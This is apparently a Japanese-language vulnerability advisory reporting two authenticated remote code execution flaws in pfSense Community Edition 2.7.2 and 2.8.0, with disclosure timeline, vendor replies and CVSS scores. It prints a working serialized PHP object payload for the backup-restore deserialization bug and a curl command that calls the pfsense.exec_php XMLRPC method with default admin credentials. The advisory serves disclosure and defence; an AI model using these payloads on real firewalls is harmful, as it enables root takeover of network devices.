
Netgate pfSense CE 2.7.2 および 2.8.0 における認証を要する RCE
Netgate pfSense Community Edition における認証済みリモートコード実行
| フィールド | 詳細 |
|---|---|
| 研究者 | Nelson Adhepeau (@privlabs) |
| ベンダー | Netgate |
| 製品 | pfSense Community Edition |
| バージョン | 2.7.2 および 2.8.0 |
| タイプ | 認証済みリモートコード実行 |
| 開示 | 2026年2月 |
| ベンダー通知日 | 2025年12月2日 |
| CVE 割り当て | 2026年1月28日 |
この研究は、教育およびセキュリティ意識向上のみを目的として、隔離されたラボ環境で実施されました。すべての発見事項は公開前に責任を持ってベンダーに開示されました。本アドバイザリは、本番システムへの攻撃を促すものではありません。許可のないテストは違法です。
pfSenseの設定復元メカニズムは、クラスのホワイトリスト登録、入力検証、サンドボックス化を行わずに、ユーザー制御データに対して unserialize() を呼び出します。
悪意のあるシリアル化されたPHPオブジェクトを含む細工されたバックアップファイルは、post_reboot_commands プロパティを介して任意のコマンドを注入し、完全なroot権限で mwexec() を通じて実行されます。
[Attacker] → Login as admin
→ Upload malicious .xml backup file
→ Trigger restore
→ pfSense calls unserialize() on attacker data
→ post_reboot_commands executed via mwexec()
→ [ROOT SHELL]
config.php — 復元処理ロジックpfsense_module_installer クラス — 安全でないデシリアライゼーションのターゲットmwexec() — コマンド実行シンクO:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{
i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
}
}
「確認済み。認証された管理者による悪用として分類。パッチは発行されません。」 — Netgate
pfSense CE 2.8.0 は、XMLRPC メソッド pfsense.exec_php を公開しており、検証、サンドボックス化、またはいかなる制限もなしに任意のPHPコードをrootとして実行します。
エンドポイントは以下の通りです。
admin:pfsense)で悪用可能[Attacker] → Send XMLRPC request to /xmlrpc.php
→ Authenticate with admin:pfsense (default)
→ Call pfsense.exec_php with arbitrary PHP
→ Code executes as root, no sandboxing
→ [ROOT SHELL]
xmlrpc.php — API エントリポイントpfsense.exec_php — 安全でない動的コード実行curl -k -u admin:pfsense \
-H "Content-Type: text/xml" \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params>
<param>
<value><string>system("id");</string></value>
</param>
</params>
</methodCall>' \
https://<target>/xmlrpc.php
「確認済み。認証されたユーザーに対する期待される動作として分類。パッチの予定はありません。」 — Netgate
November 2025 → 脆弱性発見
December 2, 2025 → Netgateへの責任ある開示
→ ベンダー確認、パッチ未計画
January 28, 2026 → MITREによりCVE ID割り当て
February 2026 → 公開開示
Nelson Adhepeau — 独立系セキュリティ研究者
| フィールド | 値 |
|---|
| CVSS v3.1 | 8.8(High) |
| Vector | AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-502, CWE-915 |
| 攻撃タイプ | 認証済み(管理者) |
| コンポーネント | バックアップ/復元メカニズム |
| フィールド | 値 |
|---|
| CVSS v3.1 | 9.9(Critical) |
| Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| CWE | CWE-284, CWE-915 |
| 攻撃タイプ | 認証済み(リモート、Basic認証) |
| コンポーネント | XMLRPC API — pfsense.exec_php |